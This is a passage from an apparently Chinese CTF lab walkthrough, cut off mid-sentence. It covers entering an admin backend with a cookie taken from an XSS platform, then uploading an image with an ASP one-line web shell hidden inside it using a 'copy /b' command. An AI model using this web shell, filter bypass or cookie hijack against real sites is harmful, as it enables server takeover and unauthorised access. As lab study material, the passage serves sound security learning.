1.使用cookie进入后台
根据提示信息
需要用到上个关卡的cookie,去XSS平台拿到cookie,删去flag=zkz{****},
点击之前,打开Burp,进行抓包,替换cookie
放行,进入后台页面。
2.找上传点
在产品管理-添加产品中可以上传图片。
上传带asp一句话的图片,
asp一句话:<%eval request (“hacker”)%>
木马一般会被拦截,做成图片,可以使用copy命令制作
copy 1.jpg/b+2.asp/a a.jpg
上传,产品图片里会告诉图片路径和图片名(对于上传